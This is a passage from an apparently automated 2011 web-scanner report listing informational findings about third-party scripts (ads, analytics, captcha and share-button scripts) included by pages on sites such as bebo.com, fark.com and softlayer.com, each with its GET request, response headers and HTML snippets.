User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 26956
Date: Wed, 06 Jul 2011 11:21:59 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
</div>
<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...
</script>
<script language="javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
<script language="javascript" src="http://api.viximo.com/javascripts/api/viximo.js"></script>
...[SNIP]...
</script>
<script src="http://bebo.crwdcntrl.net/cc.js" type="text/javascript"></script>
...[SNIP]...

14.15. http://www.bebo.com/Chart.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bebo.com
Path:   /Chart.jsp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Chart.jsp HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Resin/3.0.24
Vary: Accept-Encoding
Cache-Control: no-cache
Pragma: No-cache
Content-Language: en-US
Content-Type: text/html; charset=utf-8
Content-Length: 15645
Date: Wed, 06 Jul 2011 14:07:32 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta n
...[SNIP]...
</div>
<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...
</script><script language="javascript" src="http://api.viximo.com/javascripts/api/viximo.js"></script>
...[SNIP]...
</script>
<script src="http://bebo.crwdcntrl.net/cc.js" type="text/javascript"></script>
...[SNIP]...

14.16. http://www.bebo.com/SwitchLanguage.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bebo.com
Path:   /SwitchLanguage.jsp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /SwitchLanguage.jsp HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Resin/3.0.24
Vary: Accept-Encoding
Cache-Control: no-cache
Pragma: No-cache
Content-Language: en-US
Content-Type: text/html; charset=utf-8
Content-Length: 4640
Date: Wed, 06 Jul 2011 14:07:32 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">null</div></div><div c
...[SNIP]...
</script>
<script src="http://bebo.crwdcntrl.net/cc.js" type="text/javascript"></script>
...[SNIP]...

14.17. http://www.bebo.com/c/invite/join

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bebo.com
Path:   /c/invite/join

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /c/invite/join HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 22983
Date: Wed, 06 Jul 2011 14:07:31 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
</script>
<script language="javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...
</div>
<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...
<div id="adcopy-captcha">
       <script type="text/javascript"
       src="http://api.solvemedia.com/papi/challenge.script?k=L9oIXIWrUZosdnonwORaAY-QZ-w5sMIv">

       </script>
...[SNIP]...
</script><script language="javascript" src="http://api.viximo.com/javascripts/api/viximo.js"></script>
...[SNIP]...
</script>
<script src="http://bebo.crwdcntrl.net/cc.js" type="text/javascript"></script>
...[SNIP]...

14.18. http://www.bebo.com/c/photos/view

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bebo.com
Path:   /c/photos/view

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /c/photos/view HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14927
Date: Wed, 06 Jul 2011 14:07:30 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
</div>
<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...
</script>
<script language="javascript" src="http://api.viximo.com/javascripts/api/viximo.js"></script>
...[SNIP]...
</script>
<script src="http://bebo.crwdcntrl.net/cc.js" type="text/javascript"></script>
...[SNIP]...

14.19. http://www.bebo.com/c/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bebo.com
Path:   /c/search

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /c/search HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 16680
Date: Wed, 06 Jul 2011 14:07:31 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
</div>
<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...
</script><script language="javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...
</script>
<script language="javascript" src="http://api.viximo.com/javascripts/api/viximo.js"></script>
...[SNIP]...
</script>
<script src="http://bebo.crwdcntrl.net/cc.js" type="text/javascript"></script>
...[SNIP]...

14.20. http://www.cadence.com/Community/blogs/fv/archive/2011/07/06/celebrating-the-success-of-the-uvm-world-web-site.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cadence.com
Path:   /Community/blogs/fv/archive/2011/07/06/celebrating-the-success-of-the-uvm-world-web-site.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /Community/blogs/fv/archive/2011/07/06/celebrating-the-success-of-the-uvm-world-web-site.aspx?CMP=home HTTP/1.1
Host: www.cadence.com
Proxy-Connection: keep-alive
Referer: http://www.cadence.com/us/pages/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=cadencemossprod%3D%2526pid%253Dus%25253Apages%25253Adefault.aspx%2526pidt%253D1%2526oid%253Dhttp%25253A//www.cadence.com/Community/blogs/fv/archive/2011/07/06/celebrating-the-success-of-the-uvm-worl%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 140289
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
CommunityServer: 3.1.20917.1142
X-Pingback: http://www.cadence.com/Community/blogs/fv/pingback.aspx
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Wed, 06 Jul 2011 17:00:57 GMT; expires=Fri, 06-Jul-2012 00:00:57 GMT; path=/
Set-Cookie: CSAnonymous=0cf4fa54-a507-48c0-b09a-3c779c8443a8; expires=Thu, 07-Jul-2011 01:00:57 GMT; path=/
Date: Thu, 07 Jul 2011 00:00:57 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
</script>
<script type="text/javascript" src="http://w.sharethis.com/button/buttons.js"></script>
...[SNIP]...

14.21. http://www.facebook.com/2008/fbml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /2008/fbml

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /2008/fbml HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F2008%2Ffbml; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F2008%2Ffbml; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.213.63
Connection: close
Date: Wed, 06 Jul 2011 11:21:54 GMT
Content-Length: 11639

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class="
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/v1/yH/r/OxE2LmxCQTF.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yJ/r/P7734y4-nbQ.js"></script>
...[SNIP]...

14.22. http://www.fark.com/cgi/farkit.pl

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fark.com
Path:   /cgi/farkit.pl

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /cgi/farkit.pl HTTP/1.1
Host: www.fark.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 14:07:35 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
Server: Apache
P3P: CP="CAO PSA OUR"
Set-Cookie: FarkUser=v7aH50e9gtrYYySpXPTIo-nBHGZ9nVB94SwKRg1VwhFj-9-YQL5BzG0ppgaq3-8tel444UtsZSFScvB7a-XxADQaRnWCK; Domain=.fark.com; Expires=Sat, 30-Jun-2012 14:07:35 GMT; Max-Age=31104000; Path=/; Version=1; HttpOnly
Expires: Wed, 06 Jul 2011 14:07:35 GMT
Vary: Accept-Encoding,User-Agent
Cache-Control: no-cache, must-revalidate
Content-Length: 36547

<!doctype html>
<!-- paulirish.com/2008/conditional-stylesheets-vs-css-hacks-answer-neither/ -->
<!--[if lt IE 7 ]> <html class="no-js ie6" lang="en"> <![endif]-->
<!--[if IE 7 ]> <html class="no-j
...[SNIP]...
<![endif]--> <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
</script> <script type='text/javascript' src='http://static.fmpub.net/site/fark'></script>
...[SNIP]...
<!-- Start Quantcast tag (tt) --> <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

14.23. http://www.microsofthardwareblog.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.microsofthardwareblog.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.microsofthardwareblog.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.1
X-Pingback: http://microsofthardwareblog.com/xmlrpc.php
X-Powered-By: ASP.NET
Date: Wed, 06 Jul 2011 14:03:36 GMT
Connection: close
Content-Length: 67533

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="ht
...[SNIP]...
</script><script type="text/javascript" src="http://js.microsoft.com/library/mnp/2/wt/js/wt.js"></script>
...[SNIP]...
</link>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...

14.24. http://www.opensource.org/licenses/gpl-license.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opensource.org
Path:   /licenses/gpl-license.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /licenses/gpl-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 14:05:58 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.19 OpenSSL/0.9.8n DAV/2 SVN/1.6.17
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=hgig1lfiopk95ql3u4pi3mr831; expires=Fri, 29-Jul-2011 17:39:18 GMT; path=/; domain=.opensource.org
Last-Modified: Wed, 06 Jul 2011 14:02:03 GMT
ETag: "1a6140a90b059f012afb34dbb1337aac"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Content-Length: 7275
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<div class="content"><script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

14.25. http://www.opensource.org/licenses/mit-license.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opensource.org
Path:   /licenses/mit-license.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /licenses/mit-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:12 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.19 OpenSSL/0.9.8n DAV/2 SVN/1.6.17
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=nckibgvdkif5pk4ruq9eiask34; expires=Fri, 29-Jul-2011 15:10:32 GMT; path=/; domain=.opensource.org
Last-Modified: Wed, 06 Jul 2011 11:32:17 GMT
ETag: "88cb710a049c0b384cfdb46952931378"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24287

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<div class="content"><script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

14.26. http://www.ravenwoodfair.com/viximo.xd_proxy.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ravenwoodfair.com
Path:   /viximo.xd_proxy.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /viximo.xd_proxy.html HTTP/1.1
Host: www.ravenwoodfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: PasteWSGIServer/0.5 Python/2.6.4
Date: Wed, 06 Jul 2011 14:06:04 GMT
p3p: CP="CAO PSA OUR"
content-type: text/html; charset=utf-8
pragma: no-cache
cache-control: no-cache
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<body>
<!-- Link to the Viximo platform file -->
<script src="http://api.viximo.com/javascripts/api/viximo.xd.js" type="text/javascript"></script>
...[SNIP]...

14.27. http://www.softlayer.com/about/analyst-relations/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.softlayer.com
Path:   /about/analyst-relations/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /about/analyst-relations/ HTTP/1.1
Host: www.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:17 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Wed, 06 Jul 2011 11:37:17 GMT
Connection: close
Content-Type: text/html
Content-Length: 22617

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:dc="http
...[SNIP]...
<link
rel="canonical" href="http://www.softlayer.com/about/analyst-relations/" /> <script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...

14.28. http://www.softlayer.com/about/careers/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.softlayer.com
Path:   /about/careers/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /about/careers/ HTTP/1.1
Host: www.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:17 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Wed, 06 Jul 2011 11:37:17 GMT
Connection: close
Content-Type: text/html
Content-Length: 21288

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:dc="http
...[SNIP]...
<link
rel="canonical" href="http://www.softlayer.com/about/careers/" /> <script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...

14.29. http://www.softlayer.com/about/contact-us/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.softlayer.com
Path:   /about/contact-us/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /about/contact-us/ HTTP/1.1
Host: www.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:16 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Wed, 06 Jul 2011 11:37:16 GMT
Connection: close
Content-Type: text/html
Content-Length: 26084

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:dc="http
...[SNIP]...
<link
rel="canonical" href="http://www.softlayer.com/about/contact-us/" /> <script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...

14.30. http://www.softlayer.com/about/feedback

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.softlayer.com
Path:   /about/feedback

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /about/feedback HTTP/1.1
Host: www.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:18 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Wed, 06 Jul 2011 11:37:18 GMT
Connection: close
Content-Type: text/html
Content-Length: 21557

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:dc="http
...[SNIP]...
<link
rel="canonical" href="http://www.softlayer.com//about/feedback/" /> <script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...

14.31. http://www.softlayer.com/cloudlayer/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.softlayer.com
Path:   /cloudlayer/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /cloudlayer/ HTTP/1.1
Host: www.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:25 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Wed, 06 Jul 2011 11:37:25 GMT
Connection: close
Content-Type: text/html
Content-Length: 23260

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:dc="http
...[SNIP]...
<link
rel="canonical" href="http://www.softlayer.com/cloudlayer/" /> <script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...

14.32. http://www.softlayer.com/dedicated/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.softlayer.com
Path:   /dedicated/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /dedicated/ HTTP/1.1
Host: www.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:23 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Wed, 06 Jul 2011 11:37:23 GMT
Connection: close
Content-Type: text/html
Content-Length: 104124

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:dc="http
...[SNIP]...
<link
rel="canonical" href="http://www.softlayer.com/dedicated/" /> <script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...

14.33. http://www.softlayer.com/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.softlayer.com
Path:   /index.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /index.html HTTP/1.1
Host: www.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:22 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Wed, 06 Jul 2011 11:37:22 GMT
Connection: close
Content-Type: text/html
Content-Length: 29867

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:dc="http
...[SNIP]...
<link
rel="canonical" href="http://www.softlayer.com/" /> <script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...

14.34. http://www.softlayer.com/legal/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.softlayer.com
Path:   /legal/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /legal/ HTTP/1.1
Host: www.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:20 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Wed, 06 Jul 2011 11:37:20 GMT
Connection: close
Content-Type: text/html
Content-Length: 21961

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:dc="http
...[SNIP]...
<link
rel="canonical" href="http://www.softlayer.com/legal/" /> <script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...

14.35. http://www.softlayer.com/partners/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.softlayer.com
Path:   /partners/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /partners/ HTTP/1.1
Host: www.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:27 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Wed, 06 Jul 2011 11:37:27 GMT
Connection: close
Content-Type: text/html
Content-Length: 40276

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:dc="ht
...[SNIP]...
<!-- Begin Marketo Munchkin Tracker -->
<script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...

14.36. http://www.softlayer.com/press

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.softlayer.com
Path:   /press

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /press HTTP/1.1
Host: www.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:28 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Wed, 06 Jul 2011 11:37:28 GMT
Connection: close
Content-Type: text/html
Content-Length: 76287

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:dc="http
...[SNIP]...
<link
rel="canonical" href="http://www.softlayer.com/press/" /> <script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...

14.37. http://www.softlayer.com/resources/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.softlayer.com
Path:   /resources/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /resources/ HTTP/1.1
Host: www.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:22 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Wed, 06 Jul 2011 11:37:22 GMT
Connection: close
Content-Type: text/html
Content-Length: 23896

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"><html
